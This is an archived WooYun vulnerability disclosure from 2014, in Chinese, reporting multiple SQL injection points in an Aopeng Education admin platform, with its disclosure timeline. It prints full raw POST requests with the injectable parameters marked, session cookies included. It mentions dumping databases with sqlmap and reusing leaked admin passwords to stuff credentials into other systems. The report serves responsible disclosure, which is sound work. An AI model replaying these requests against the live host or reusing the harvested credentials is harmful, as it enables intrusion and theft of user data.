乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-12: 细节已通知厂商并且等待厂商处理中 2014-05-12: 厂商已经确认,细节仅向厂商公开 2014-05-22: 细节向核心白帽子及相关领域专家公开 2014-06-01: 细节向普通白帽子公开 2014-06-11: 细节向实习白帽子公开 2014-06-26: 细节向公众公开
奥鹏教育某平台多处SQL注入漏洞,其数据可引发连锁反应
奥鹏教育某平台多处SQL注入漏洞,其数据可引发连锁反应注入点1:构造post包:
POST /ajax/Open.Business.Base.AjaxMethod,Open.ashx?_method=GetRecruitBatchListAll&_session=r HTTP/1.1Host: eduadmin.open.com.cnProxy-Connection: keep-aliveContent-Length: 31Origin: http://eduadmin.open.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Referer: http://eduadmin.open.com.cn/LearningCenter/administer/QQ_Search.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: ASP.NET_SessionId=asj1uonmn040jx550quob0y5; __utma=209232844.700972994.1399801096.1399801096.1399801096.1; __utmb=209232844.1.10.1399801096; __utmc=209232844; __utmz=209232844.1399801096.1.1.utmcsr=baoming.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/search-123'.aspx; looyu_id=55111ad412db9572ffc2f9365616c9ae49_13043%3A2; looyu_13043=v%3A7246cf3d2037150fe84761024427b5fbc5%2Cref%3Ahttp%253A//baoming.open.com.cn/search-123%2527.aspx%2Cr%3A%2Cmon%3Ahttp%3A//m154.looyu.com/monitor_StudyType=01*_UniversityCode=
SQLMAP可跑出:
数据表非常多:
通过下载部分数据(用于证明)可以看到,其数据将会由于同一管理员密码撞库的影响,导致其他系统被攻击:这里已经打上马赛克,请勿担心~~~
同样存在注入漏洞的地方还有:2。构造如下数据包:
POST /ajax/Open.Business.Base.AjaxMethod,Open.ashx?_method=GetSpecialtyList&_session=r HTTP/1.1Host: eduadmin.open.com.cnProxy-Connection: keep-aliveContent-Length: 65Origin: http://eduadmin.open.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Referer: http://eduadmin.open.com.cn/LearningCenter/administer/QQ_Search.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: ASP.NET_SessionId=asj1uonmn040jx550quob0y5; __utma=209232844.700972994.1399801096.1399801096.1399801096.1; __utmb=209232844.1.10.1399801096; __utmc=209232844; __utmz=209232844.1399801096.1.1.utmcsr=baoming.open.com.cn|utmccn=(referral)|utmcmd=referral|utmcct=/search-123'.aspx; looyu_id=55111ad412db9572ffc2f9365616c9ae49_13043%3A2_StudyType=01*_RecruitBatchID=_LcenterCode=C0901001_LevelID=
3.构造如下数据包:
涉及多个数据库:
这里已经打上马赛克,请勿担心~~~
过滤
危害等级:高
漏洞Rank:18
确认时间:2014-05-12 16:47
已有漏洞,未处理
暂无